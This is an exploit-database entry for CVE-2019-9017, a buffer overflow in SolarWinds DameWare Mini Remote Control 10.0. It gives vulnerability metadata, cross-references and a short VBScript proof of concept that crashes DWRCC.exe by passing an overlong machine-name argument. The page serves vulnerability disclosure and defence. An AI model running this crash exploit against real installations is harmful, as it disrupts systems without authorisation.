SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service

🗓️ 03 May 2019 00:00:00Reported by Dino BarlattaniType

exploitdb🔗 www.exploit-db.com👁 133 Views

SolarWinds Dameware Mini Remote Control 10.0 buffer overflow Do

Reporter	Title	Published	Views	Family All 9
0day.today	SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service Exploit	3 May 201900:00	–	zdt
Circl	CVE-2019-9017	14 Nov 202406:07	–	circl
CVE	CVE-2019-9017	2 May 201918:54	–	cve
Cvelist	CVE-2019-9017	2 May 201918:54	–	cvelist
exploitpack	SolarWinds DameWare Mini Remote Control 10.0 - Denial of Service	3 May 201900:00	–	exploitpack
NVD	CVE-2019-9017	2 May 201919:29	–	nvd
Packet Storm	SolarWinds DameWare Mini Remote Control 10.0 Denial Of Service	3 May 201900:00	–	packetstorm
Prion	Buffer overflow	2 May 201919:29	–	prion
Positive Technologies	PT-2019-19312 · Solarwinds · Solarwinds Dameware Mini Remote Control	2 May 201900:00	–	ptsecurity

#Vendor:     Solarwinds
#Site Vendor:    https://www.dameware.com/
#Product:     Dameware Mini Remote Control
#Version:    10.0 x64
#Platform:    Windows
#Tested on:    Windows 7 SP1 x64
#Dscription:    The DWRCC executable file is affected by a buffer overflow vulnerability.
#The buffer size passed in on the machine name parameter is not checked
#Vector:    pass buffer to the machine host name parameter

#Author:    Dino Barlattani [email protected]
#Link:        http://www.binaryworld.it

#CVE ID:    CVE-2019-9017

#POC in VB Script

option explicit
dim fold,exe,buf,i,wsh,fso,result
exe = "DWRCC.exe"
fold = "C:\program files\SolarWinds\DameWare Mini Remote Control 10.0 x64
#1\"
for i = 0 to 300
    buf = buf & "A"
next
set wsh = createobject("wscript.shell")
set fso = createobject("scripting.filesystemobject")
if fso.folderexists(fold) then
    fold = fold & exe
    fold = chr(34) & fold & chr(34)
    result = wsh.run(fold & " -c: -h: -m:" & buf,0,true)
end if

03 May 2019 00:00Current

7.6High risk

Vulners AI Score7.6

CVSS 25

CVSS 3.17.5

EPSS0.21031